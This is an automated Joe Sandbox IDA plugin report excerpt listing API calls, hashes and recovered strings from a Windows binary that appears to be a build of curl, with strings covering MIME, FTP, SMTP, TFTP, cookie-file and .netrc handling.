                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,000CF2DD,?,?,?,000CF296), ref: 000CF0B1
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,000CF2DD,?,?,?,000CF296), ref: 000CF0F7
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,000CF2DD,?,?,?,000CF296), ref: 000CF13D
                                          • Part of subcall function 000CEEAB: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,000CF2DD,?,?,?,000CF296), ref: 000CF1C0
                                          • Part of subcall function 000CE9EB: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,00000000,00000000,blobpointer,?,?,?,?,?,?,?,?), ref: 000CEA46
                                        Strings
                                        • curl_mime_name(part%d, "%s");, xrefs: 000CF11A
                                        • mime%d = NULL;, xrefs: 000CF048
                                        • curl_mime_filename(part%d, NULL);, xrefs: 000CEFBE
                                        • part%d = curl_mime_addpart(mime%d);, xrefs: 000CEEE9
                                        • curl_mime_encoder(part%d, "%s");, xrefs: 000CF08E
                                        • curl_mime_data(part%d, "%s", CURL_ZERO_TERMINATED);, xrefs: 000CEFF3
                                        • curl_mime_filedata(part%d, "%s");, xrefs: 000CEF8D
                                        • curl_mime_subparts(part%d, mime%d);, xrefs: 000CF029
                                        • (curl_seek_callback) fseek, NULL, stdin);, xrefs: 000CEF61
                                        • curl_mime_headers(part%d, slist%d, 1);, xrefs: 000CF198
                                        • slist%d = NULL;, xrefs: 000CF1AF
                                        • curl_mime_type(part%d, "%s");, xrefs: 000CF160
                                        • curl_mime_data_cb(part%d, -1, (curl_read_callback) fread, \, xrefs: 000CEF45
                                        • curl_mime_filename(part%d, "%s");, xrefs: 000CF0D4
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free$malloc
                                        • String ID: (curl_seek_callback) fseek, NULL, stdin);$curl_mime_data(part%d, "%s", CURL_ZERO_TERMINATED);$curl_mime_data_cb(part%d, -1, (curl_read_callback) fread, \$curl_mime_encoder(part%d, "%s");$curl_mime_filedata(part%d, "%s");$curl_mime_filename(part%d, "%s");$curl_mime_filename(part%d, NULL);$curl_mime_headers(part%d, slist%d, 1);$curl_mime_name(part%d, "%s");$curl_mime_subparts(part%d, mime%d);$curl_mime_type(part%d, "%s");$mime%d = NULL;$part%d = curl_mime_addpart(mime%d);$slist%d = NULL;
                                        • API String ID: 2190258309-2644548734
                                        • Opcode ID: 4ab10a1860deacd57d3b6c4b6a977d5ea7fad4269afbdbdd8bcc3f302bc7f058
                                        • Instruction ID: e052745a7109c19f7c6d422004200223af45d999833806e8c77a5832417b2aa9
                                        • Opcode Fuzzy Hash: 4ab10a1860deacd57d3b6c4b6a977d5ea7fad4269afbdbdd8bcc3f302bc7f058
                                        • Instruction Fuzzy Hash: BD81A633544261EBCB756B94DC46FAE36A2DB41730F28837CFD24672D2EB718E528641
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $%%%02x
                                        • API String ID: 0-2848173732
                                        • Opcode ID: b8e48d3dae992d712087caebb86d9371e8e34eb72fefd4733fb86cd814bbc98d
                                        • Instruction ID: 819d1c402c9f8fbe3924f2a12cefbca2532ceb158cd59e65dd214ff750a9c526
                                        • Opcode Fuzzy Hash: b8e48d3dae992d712087caebb86d9371e8e34eb72fefd4733fb86cd814bbc98d
                                        • Instruction Fuzzy Hash: 86F10430A08749DBDF288F64E8507BDBBF6AF45310F14806BD882A7352DB369D458B71
                                        APIs
                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00000078,00000000,?,?,?,?,000CD002), ref: 000D0658
                                        • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(00000025,00000000,?,?,?,000CD002), ref: 000D0699
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: __acrt_iob_funcfputc
                                        • String ID: %header{$curl: unknown --write-out variable: '%s'$header{
                                        • API String ID: 2340846889-221383536
                                        • Opcode ID: 95978e76fcce3af557b4e5c64bb778b764d727a20aeaa48b8c9c1c810a84e5a4
                                        • Instruction ID: f9023370a1666237da6001ab6477b65d5b34ac096b4a3164238ae8b29f1b0fde
                                        • Opcode Fuzzy Hash: 95978e76fcce3af557b4e5c64bb778b764d727a20aeaa48b8c9c1c810a84e5a4
                                        • Instruction Fuzzy Hash: 1F514931D08344EBEB244B649C0DBEE7BF5EF81754F24805BE49D9F381EAA29840D6B5
                                        APIs
                                        • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 000F7789
                                        • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 000F77FC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: strtol
                                        • String ID: %s (%d)$%s (%d) %s (%d)$%s (%ld)$Malformed ACK packet, rejecting$blksize$blksize is larger than max supported$blksize is smaller than min supported$blksize parsed from OACK$got option=(%s) value=(%s)$invalid blocksize value in OACK packet$invalid tsize -:%s:- value in OACK packet$requested$server requested blksize larger than allocated$tsize$tsize parsed from OACK
                                        • API String ID: 76114499-360479797
                                        • Opcode ID: af785fb5ae94ca5b91303a989bc1b3e2460571ed59fe84906da8068af29f85b0
                                        • Instruction ID: 7041e3ad6deaa9547688aa578af16ffbf72a5257eb07c0faa6af7c96d77290dc
                                        • Opcode Fuzzy Hash: af785fb5ae94ca5b91303a989bc1b3e2460571ed59fe84906da8068af29f85b0
                                        • Instruction Fuzzy Hash: FA516E71F88309ABD7149A649C46EBF37B5AF80740F14407AE50AB72C1EB709D02D7A2
                                        APIs
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,000001B8,?), ref: 0010EE3F
                                        • GetFileSizeEx.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?), ref: 0010EEC6
                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0010EED1
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010EF3A
                                        • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000000,00000000), ref: 0010EF76
                                        • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 0010EFC1
                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0010F006
                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,000001B8,?), ref: 0010EE50
                                          • Part of subcall function 000DA1A0: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000DA1AB
                                          • Part of subcall function 000DA1A0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA1B3
                                          • Part of subcall function 000DA1A0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA1E9
                                          • Part of subcall function 000DA1A0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA1F6
                                          • Part of subcall function 000DA1A0: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000DA1FE
                                          • Part of subcall function 000DA1A0: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 000DA209
                                        • CreateFileA.API-MS-WIN-CORE-FILE-L1-1-0(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,000001B8,?), ref: 0010EE8F
                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0010EEA1
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010EFDB
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 0010EFE9
                                        Strings
                                        • schannel: failed to determine size of CA file '%s': %s, xrefs: 0010EEE7
                                        • schannel: failed to open CA file '%s': %s, xrefs: 0010EEB7
                                        • schannel: CA file exceeds max size of %u bytes, xrefs: 0010EF18
                                        • schannel: invalid path name for CA file '%s': %s, xrefs: 0010EE66
                                        • schannel: failed to read from CA file '%s': %s, xrefs: 0010F021
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: ErrorLast$File_errno$free$CloseCreateHandleReadSize_strdupmalloc
                                        • String ID: schannel: CA file exceeds max size of %u bytes$schannel: failed to determine size of CA file '%s': %s$schannel: failed to open CA file '%s': %s$schannel: failed to read from CA file '%s': %s$schannel: invalid path name for CA file '%s': %s
                                        • API String ID: 1064901726-3430970913
                                        • Opcode ID: 483355f62eaf2702a962c5dfbe7bea8744517944f1f921d6afbffc9d19731c9f
                                        • Instruction ID: c34c8dd013370a82eaea9f10ffeb42ea3d59b9975e62f3d1833a631f8d79b7f2
                                        • Opcode Fuzzy Hash: 483355f62eaf2702a962c5dfbe7bea8744517944f1f921d6afbffc9d19731c9f
                                        • Instruction Fuzzy Hash: 4051F871A00219EBDF295B21DC06BEE77B9EB48310F10489AF549E72C1DBB09D818FA4
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F623D
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F62C2
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F634C
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F6382
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F6484
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F649E
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F64B2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID: AUTH=$ SIZE=$ SMTPUTF8$%I64d$<%s>$<%s@%s>$MAIL FROM:%s%s%s%s%s%s$Mime-Version$Mime-Version: 1.0
                                        • API String ID: 1294909896-2994854565
                                        • Opcode ID: 25b23dec81098f3d0b8b61e1468b44181ee81ed2a2aa246d14736bca99bfa35f
                                        • Instruction ID: a33c3940c4a1f769d6d92e3bcb82dafd9f3b7485adb9814600fbf34e7ed039de
                                        • Opcode Fuzzy Hash: 25b23dec81098f3d0b8b61e1468b44181ee81ed2a2aa246d14736bca99bfa35f
                                        • Instruction Fuzzy Hash: 7DC12631B0462EEBDB14DB64DC509FEBBF5FF45310F28806AE901A7641DB72AD409BA1
                                        APIs
                                          • Part of subcall function 000D0E10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000C3167), ref: 000D0E2C
                                          • Part of subcall function 000D0E10: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D0E41
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D41F8
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D420C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID: 8bit$; boundary=$; filename="$; name="$Content-Disposition$Content-Disposition: %s%s%s%s%s%s%s$Content-Transfer-Encoding$Content-Transfer-Encoding: %s$Content-Type$Content-Type: %s%s%s$application/octet-stream$attachment$form-data$multipart/$multipart/form-data$multipart/mixed$text/plain
                                        • API String ID: 1294909896-1595554923
                                        • Opcode ID: e4ae1a668a361e9766910dee178f7cc2c1ab85d729697f7d36ce62c5891a2127
                                        • Instruction ID: b70f37c46623c7825b9e4562c0df3a62f97a340f6196f6de59959f0886a2bd76
                                        • Opcode Fuzzy Hash: e4ae1a668a361e9766910dee178f7cc2c1ab85d729697f7d36ce62c5891a2127
                                        • Instruction Fuzzy Hash: F7B19D30B00716ABDB68CE69D5907AAB7E5BF58310F54813BE905E7B81D770ED90CBA0
                                        APIs
                                        • ___from_strstr_to_strchr.LIBCMT ref: 000EAB92
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000EAC3A
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000EAC4F
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000EACD1
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000EACE6
                                        Strings
                                        • read function returned funny value, xrefs: 000EADA9
                                        • *, xrefs: 000EACA5
                                        • Moving trailers state machine from initialized to sending., xrefs: 000EAB00
                                        • %zx%s, xrefs: 000EAE06
                                        • Successfully compiled trailers., xrefs: 000EAC11
                                        • Signaling end of chunked upload after trailers., xrefs: 000EAF0B
                                        • Malformatted trailing header, skipping trailer, xrefs: 000EABDD
                                        • Signaling end of chunked upload via terminating chunk., xrefs: 000EAE65
                                        • operation aborted by trailing headers callback, xrefs: 000EAC95
                                        • operation aborted by callback, xrefs: 000EAD40
                                        • Read callback asked for PAUSE when not supported, xrefs: 000EAD69
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free$___from_strstr_to_strchr
                                        • String ID: %zx%s$*$Malformatted trailing header, skipping trailer$Moving trailers state machine from initialized to sending.$Read callback asked for PAUSE when not supported$Signaling end of chunked upload after trailers.$Signaling end of chunked upload via terminating chunk.$Successfully compiled trailers.$operation aborted by callback$operation aborted by trailing headers callback$read function returned funny value
                                        • API String ID: 622630536-1407958152
                                        • Opcode ID: 44b081910ddc3248f2beeb296fcd31326227f8e8617bfd6bd2653ac47527eeb6
                                        • Instruction ID: 62d4cef82cd245a3cbb7e423d8974deba76a3dce22b3dadd2db1484e8736d826
                                        • Opcode Fuzzy Hash: 44b081910ddc3248f2beeb296fcd31326227f8e8617bfd6bd2653ac47527eeb6
                                        • Instruction Fuzzy Hash: 05D1C131A043459FDF15DF24D895BED7BE2EF89310F28417AD809AB386DB74A841CBA1
                                        APIs
                                          • Part of subcall function 000D2813: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D2848
                                        • _strrchr.LIBCMT ref: 000FE194
                                        • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000), ref: 000FE1C3
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000FE1E3
                                        Strings
                                        • Uploading to a URL without a file name, xrefs: 000FE380
                                        • path contains control characters, xrefs: 000FE154
                                        • Request has same path as previous transfer, xrefs: 000FE41F
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: _strrchrcallocfreemalloc
                                        • String ID: Request has same path as previous transfer$Uploading to a URL without a file name$path contains control characters
                                        • API String ID: 2159935718-4131979473
                                        • Opcode ID: 5d388b734b2a9bcb3cae0211f0a5a12d2e7722508121c7a475e07628c175557b
                                        • Instruction ID: 0c858b2a1c3896a7a46b221cddf3ad4c4c3e0cf6580a711aec9d0043e01742b9
                                        • Opcode Fuzzy Hash: 5d388b734b2a9bcb3cae0211f0a5a12d2e7722508121c7a475e07628c175557b
                                        • Instruction Fuzzy Hash: D7A13330A0434A9FDB688F64D848ABE7BF5EF44310F14407EEA46E36A1DB70AD419B55
                                        APIs
                                          • Part of subcall function 000DFA05: _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,00000000,?,000E128E,?,?,000E0F71,00000000,?,00000001), ref: 000DFA12
                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00000000,?,00000001,?,?,?,?,?,?,?,?,?,?,000E128E,?), ref: 000E0F81
                                        • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00116C58,00000000,?,00000001,?,?,?,?,?,?,?,?,?,?,000E128E), ref: 000E0FD2
                                        • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(# Netscape HTTP Cookie File# https://curl.se/docs/http-cookies.html# This file was generated by libcurl! Edit at your own risk.,00000000,?,?,?,?,?,?,?,?,?,?,000E128E,?,?,74F83C50), ref: 000E0FED
                                        • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E101B
                                        • qsort.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000,00000000,00000004,000E0B10), ref: 000E105E
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E10A0
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E10C0
                                        • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,000E128E,?,?,74F83C50,00000000,000E182F), ref: 000E10CA
                                          • Part of subcall function 000F50DE: _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?,00000000), ref: 000F510A
                                          • Part of subcall function 000F50DE: _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,00000000), ref: 000F5118
                                          • Part of subcall function 000F50DE: MoveFileExA.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-0(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING),00000000,?,00000000), ref: 000F5166
                                          • Part of subcall function 000F50DE: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000F5175
                                          • Part of subcall function 000F50DE: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 000F5181
                                        • _unlink.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000000,?,?,?,?,?,?,?,000E128E,?,?,74F83C50,00000000,000E182F), ref: 000E10E0
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,000E128E,?,?,74F83C50,00000000,000E182F), ref: 000E10FA
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,000E128E,?,?,74F83C50,00000000,000E182F), ref: 000E113C
                                        Strings
                                        • %s.%s.tmp, xrefs: 000E0FB2
                                        • %s, xrefs: 000E1083
                                        • # Netscape HTTP Cookie File# https://curl.se/docs/http-cookies.html# This file was generated by libcurl! Edit at your own risk., xrefs: 000E0FE8
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free$_strdup$FileMove__acrt_iob_func_time64_unlinkcallocfclosefopenfputsqsort
                                        • String ID: # Netscape HTTP Cookie File# https://curl.se/docs/http-cookies.html# This file was generated by libcurl! Edit at your own risk.$%s$%s.%s.tmp
                                        • API String ID: 2634863294-1951421411
                                        • Opcode ID: 6a483c86f756c77e1003be790543e10ca4df6ed33173613dd7cc0e3f3ee66d48
                                        • Instruction ID: f17bba84b4e5402b931cd34e785fed853297dda33ecf4c8ace6c03215dd723bf
                                        • Opcode Fuzzy Hash: 6a483c86f756c77e1003be790543e10ca4df6ed33173613dd7cc0e3f3ee66d48
                                        • Instruction Fuzzy Hash: B351F871A04259DFDF149F65EC45AEEBBF5EF88750F14402AE901B7281DBB05C828BA1
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000FB935
                                        • ___from_strstr_to_strchr.LIBCMT ref: 000FB962
                                          • Part of subcall function 000C3857: __stdio_common_vsscanf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,000000FF,?,00000000,?), ref: 000C3872
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000FBC25
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000FBD5A
                                        Strings
                                        • Illegal port number in EPSV reply, xrefs: 000FB9C2
                                        • Weirdly formatted EPSV reply, xrefs: 000FBA0D
                                        • Skip %u.%u.%u.%u for data connection, re-use %s instead, xrefs: 000FBAFB
                                        • Connecting to %s (%s) port %d, xrefs: 000FBD2E
                                        • %c%c%c%u%c, xrefs: 000FB98D
                                        • Bad PASV/EPSV response: %03d, xrefs: 000FBDB8
                                        • Couldn't interpret the 227-response, xrefs: 000FBDA6
                                        • Can't resolve proxy host %s:%hu, xrefs: 000FBBCF
                                        • %u,%u,%u,%u,%u,%u, xrefs: 000FBA7C
                                        • Can't resolve new host %s:%hu, xrefs: 000FBCA4
                                        • %u.%u.%u.%u, xrefs: 000FBB34
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free$___from_strstr_to_strchr__stdio_common_vsscanf
                                        • String ID: %c%c%c%u%c$%u,%u,%u,%u,%u,%u$%u.%u.%u.%u$Bad PASV/EPSV response: %03d$Can't resolve new host %s:%hu$Can't resolve proxy host %s:%hu$Connecting to %s (%s) port %d$Couldn't interpret the 227-response$Illegal port number in EPSV reply$Skip %u.%u.%u.%u for data connection, re-use %s instead$Weirdly formatted EPSV reply
                                        • API String ID: 2616960956-1503635593
                                        • Opcode ID: 3c0249be188157892dff5f522a596c9f5770f1a8b308a882de1d94a3a521a55c
                                        • Instruction ID: 085ddea8fa259f3d27fe19f453ae295848de1fd791b7819f39cbb4904763cb94
                                        • Opcode Fuzzy Hash: 3c0249be188157892dff5f522a596c9f5770f1a8b308a882de1d94a3a521a55c
                                        • Instruction Fuzzy Hash: 37D1F3B1A08346ABD7149F24DC40BBAB7E5FF84310F00492EF68593682EB74E854DF96
                                        APIs
                                        • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00117A20), ref: 000F8C37
                                        • fgets.API-MS-WIN-CRT-STDIO-L1-1-0(?,00001000,00000000), ref: 000F8C5B
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F8D7D
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F8E2E
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F8F8D
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F8FA8
                                        • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 000F8FB1
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F9015
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F904B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free$fclosefgetsfopen
                                        • String ID: $default$login$macdef$machine$password
                                        • API String ID: 1690894011-416575051
